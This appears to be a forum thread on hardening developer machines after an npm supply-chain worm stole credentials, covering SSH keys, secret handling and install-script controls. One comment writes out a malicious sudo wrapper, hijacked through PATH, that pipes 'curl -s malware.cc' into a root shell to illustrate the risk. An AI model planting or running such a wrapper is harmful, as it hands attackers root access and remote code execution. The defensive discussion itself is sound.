You can also just generate new SSH keys and protect them with a PIN.
Stop storing SSH keys on the filesystem; use an agent (like 1Password) to mediate access instead.
Stop storing dev secrets/credentials on the filesystem; inject them into processes with env vars or other mechanisms. Your password manager may have a way to do this (see the sketch below).
Develop in a VM separate from your regular computer usage. On Windows this is essentially the norm anyway via WSL, but similar options exist for other OSes.
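For example, the 1Password CLI can resolve secret references at launch time and inject them only into the child process's environment (a sketch; the vault and item names are made up):

    # .env holds references, not plaintext secrets
    AWS_ACCESS_KEY_ID="op://dev-vault/aws/access-key-id"
    AWS_SECRET_ACCESS_KEY="op://dev-vault/aws/secret-access-key"

    # `op run` resolves the references and runs the command with them in
    # its environment; nothing is written to disk
    op run --env-file=.env -- npm test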
One benefit of Microsoft requiring a TPM for Windows 11 support is that nearly every recent computer has one, either as a discrete hardware chip or emulated by the CPU firmware.
It guarantees that the private key can never be exfiltrated or copied. But it doesn't stop malicious software on your machine from doing bad things with that key from your machine. So I'm not certain how much protection it really offers in this scenario.
Linux example: https://wiki.gentoo.org/wiki/Trusted_Platform_Module/SSH
macOS example (I haven't tested personally): https://gist.github.com/arianvp/5f59f1783e3eaf1a2d4cd8e952bb...
https://wiki.archlinux.org/title/SSH_keys#FIDO/U2F
That's what I do. For those of us too lazy to read the article, tl;dr:
    ssh-keygen -t ed25519-sk

or, if your FIDO token doesn't support Edwards curves:

    ssh-keygen -t ecdsa-sk

Tap the token when ssh asks for it, done. Use the SSH key as usual. OpenSSH will ask you to tap the token every time you use it, so silent git pushes without you confirming via a tap become impossible. Extracting the key file from your machine accomplishes nothing; it's useless without the hardware token.
I mean, if passphrases were good for anything, you'd use them directly for the SSH connection, right? :)
There are lots of agents out there, from the basic `ssh-agent`, to `ssh-agent` integrated with the macOS keychain (which automatically unlocks when you log in), to 1Password (which is quite nice!).
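For the keychain-integrated flavor, the setup is roughly this (a sketch; these option names are from recent macOS OpenSSH builds, older ones used `ssh-add -K`):

    # ~/.ssh/config
    Host *
      AddKeysToAgent yes
      UseKeychain yes

    # store the passphrase in the login keychain once
    ssh-add --apple-use-keychain ~/.ssh/id_ed25519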
A case like this really brings that out. A compromised dev machine means that anything that doesn't require a separate piece of hardware asking for your interaction is not going to help. And the more interactions you require to tighten security, the more tedious it becomes, and you're likely to end up instinctively pressing the fob whenever it asks.
Sure, it raises the bar a bit, because malware has to take it into account, and if there are enough softer targets they may not have bothered. This time.
Classic: you only have to outrun the other guy. Not the lion.
1Password, for example, will pop up a fingerprint request on my Mac before handling the first connection request from each new application, then allow additional requests for a configurable period; by default, it also locks the agent when you lock your machine. See e.g. https://developer.1password.com/docs/ssh/agent/security
With this setup there are two different SSH keys (one for access to GitHub, one for commit signing), but you don't use either to push/pull to GitHub; you use OAuth (over HTTPS). This combination provides the most security you can get without hardware tokens, and 1Password and the OAuth apps make it seamless.
Do not use a user with admin credentials for day-to-day tasks; make the admin account a separate user, with its credentials kept in 1Password. This way, if your regular account gets compromised, the attacker will not have admin credentials.
[1] https://developer.1password.com/docs/ssh/agent/
[2] https://developer.1password.com/docs/ssh/git-commit-signing/
[3] https://github.com/hickford/git-credential-oauth
[4] https://cli.github.com/manual/gh_auth_login
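Roughly, the git side of that setup looks like this (a sketch assembled from the docs above; the signing key value and the macOS app path are placeholders you'd take from your own 1Password install):

    # ~/.gitconfig
    [gpg]
      format = ssh
    [user]
      signingkey = ssh-ed25519 AAAA...your-public-key
    [commit]
      gpgsign = true
    [gpg "ssh"]
      program = /Applications/1Password.app/Contents/MacOS/op-ssh-sign
    [credential]
      # git-credential-oauth [3] handles the HTTPS push/pull auth flow
      helper = oauth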
You can make it a bit more challenging for the attacker by using secure enclaves (like a TPM or a YubiKey), enforcing signed commits, etc., but if someone has compromised your machine, they can do whatever you can do.
Enforcing sign-off on commits by multiple people is probably your only bet. But if you have admin creds, an attacker can turn that off, too. So, depending on your paranoia level and risk appetite, you may need a dedicated machine for admin actions.
It can also just get lucky and perform a 'git push' while your SSH agent happens to be unlocked. We don't want to rely on luck here.
Really, it's pointless. Unless you are signing specific actions from an independent piece of hardware [1], the malware can do what you can do. We can talk about the details all day long, and you can make it a bit harder for autonomously acting malware, but at the end of the day it's trivial for an attacker to do what they want once they've compromised your machine.
[1] https://www.reiner-sct.com/en/tan-generators/tan-generator-f... (Note that a display is required so you can see what specific action you are actually signing, in this case it shows amount and recipient bank account number.)
I don't think you're necessarily wrong in theory -- but on the other hand you seem to discount taking reasonable (if imperfect) precautionary and defensive measures in favor of an "impossible, therefore don't bother" attitude. Taken to its logical extreme, people with such attitudes would never take risks like driving, or let their children out of the house.
The malware puts this in your bashrc or equivalent:

    PATH=/tmp/malware/bin:$PATH

and this in /tmp/malware/bin/sudo:

    #!/bin/bash
    # run the payload with the privileges you just typed your password for,
    # then run the command you actually asked for
    /usr/bin/sudo bash -c "curl -s malware.cc | sh && $*"
You get the idea. It can do something similar with the git binary and hijack "git commit" so that it amends whatever it wants, and you will happily sign it and push it using your hardened SSH agent. You say it's unlikely? Fine, then your risk appetite is sufficiently high. I just want to highlight the risk.
If your machine is compromised, it's game over.
https://docs.github.com/en/get-started/git-basics/caching-yo...
The org only has 4-5 engineers, so you can imagine the impact on a large org.
There has to be a tool that allows you (or an AI) to easily review post-install scripts before you install the package.
pnpm does it by default, yarn can be configured. Not sure about npm itself.
npm still seems to be debating whether they even want to do it. That's one of many reasons I ditched npm for yarn years ago (though the initial impetus was npm's confused and constantly changing behavior around peer dependencies).
If you are still on yarn v1, I suggest being consistent with '--ignore-scripts --frozen-lockfile' and running any necessary lifecycle scripts for dependencies yourself. There is @lavamoat/allow-scripts to manage this if your project warrants it; see the sketch below.
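Concretely, something like this (a sketch; the package names under allowScripts are made-up examples, and the config shape follows the @lavamoat/allow-scripts README):

    # yarn v1: never run lifecycle scripts on install
    yarn install --ignore-scripts --frozen-lockfile

    # package.json: let allow-scripts run only the build steps you vet
    {
      "lavamoat": {
        "allowScripts": {
          "esbuild": true,
          "some-sketchy-dep": false
        }
      }
    }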
If you are on newer yarn versions, I strongly encourage migrating off to either pnpm or npm.
Any links for further reading on security problems "under current maintainership"?
And then opt certain packages back in with dependenciesMeta in package.json https://yarnpkg.com/configuration/manifest#dependenciesMeta....
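In Yarn Berry terms that looks roughly like this (a sketch; esbuild stands in for whichever package's build step you actually trust):

    # .yarnrc.yml: disable all lifecycle scripts
    enableScripts: false

    # package.json: opt one package back in
    {
      "dependenciesMeta": {
        "esbuild": { "built": true }
      }
    }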
Personally, I don't really agree with "was not compromised".
You say yourself that the guy had access to your secrets and AWS; I'd definitely consider that compromised, even if the guy (to your knowledge) didn't read anything from the database. Assume breach if access was possible.
Are you sure they didn't get a service account token from some other service and then use that to access customer data?
I've never seen anyone claim in writing that all permutations were exhaustively checked in the audit logs.
Also, everything was double base64 encoded, which makes it impossible to find via GitHub search.
(personal site linked in bio, which links you onward to my LinkedIn)
[1] https://x.com/ramimacisabird/status/1994598075520749640?s=20
It was a really noisy worm, though, and it looked like a few actors also jumped on the exposed credentials, making private repos public and modifying READMEs to promote a startup/Discord.
No, your security failure is that you use a package manager that allows third parties to push arbitrary code into your product with no oversight. You only have "security" to the extent that you can trust the people who control those packages to act both competently and in good faith, ad infinitum.
Also, the OP seemingly implies credentials are stored on the filesystem in plaintext, but I might be extrapolating too much there.
For example, with AWS you can use the AWS CLI to sign in, and that goes through the HTTPS auth flow to provide you with temporary access keys (see the sketch below). Which means:
1. You don't have any access keys in plain text.
2. Even if your env vars are also stolen, those AWS keys expire within a few hours anyway.
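A minimal sketch of that flow with IAM Identity Center (the profile name, start URL, and IDs are made up):

    # ~/.aws/config
    [profile dev]
    sso_start_url = https://example.awsapps.com/start
    sso_region = eu-west-1
    sso_account_id = 123456789012
    sso_role_name = DeveloperAccess

    # opens the browser auth flow; the CLI caches short-lived credentials
    aws sso login --profile dev
    aws s3 ls --profile dev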
If the cloud service you're using doesn't support OIDC or any other ephemeral access keys, then you should store them encrypted. There are numerous ways you can do this, from password managers to just using PGP/GPG directly. Just make sure you aren't pasting them into your shell, otherwise you'll have those keys in plain text in your .history file.
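For instance, with plain GPG (a sketch; the file path, recipient, and deploy script are made up):

    # encrypt the key once; reads the secret from stdin
    gpg --encrypt --recipient you@example.com --output ~/.secrets/api-key.gpg

    # decrypt straight into one process's environment; the plaintext never
    # lands in a file or in your shell history
    API_KEY="$(gpg --quiet --decrypt ~/.secrets/api-key.gpg)" ./deploy.sh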
I will agree that it does take effort to get your cloud credentials set up in a convenient way (easy to access, but without access keys in plain text). But if you're doing cloud stuff professionally, like the devs in the article, then you really should learn how to use these tools.
This doesn't really help for a supply chain attack, though, because you're still going to need to decrypt those keys for your code to read at some point, and the attacker has visibility into that, right?
The shell isn't the only thing the attacker has access to; they also have access to variables set in your code.
For example, for vars to be read, you'd need the compromised code to be part of the same project. But if you scan the file system, you can pick up secrets for any project written in any language, even those which differ from the code base that pulled the compromised module.
This applies directly to the article: it wasn't their core code base that ran the compromised code but an experimental repository.
Furthermore, we can see from these supply chain attacks that they do scan the file system. So we do know that encrypting secrets adds a layer of protection against the attacks happening in the wild.
In an ideal world, we’d use OIDC everywhere and not need hardcoded access keys. But in instances where we can’t, encrypting them is better than not.
Doesn't really matter; if the agent is unlocked, they can be accessed.
Sounds like there's no EDR running on the dev machines? You'd have more to investigate if SentinelOne/CrowdStrike/etc. were running.
> Total repos cloned: 669
How big is this company? All the numbers I can find online suggest well below 100 people, and yet they have over 600 repos? Is that normal?
I beg to differ and look forward to running my own fiefdom where interpreter/JIT languages are banned in all forms.
I'm curious: was the exfiltration traffic distinguishable from normal developer traffic?
We've been looking into stricter egress filtering for our dev environments, but it's always a battle between security and breaking npm install.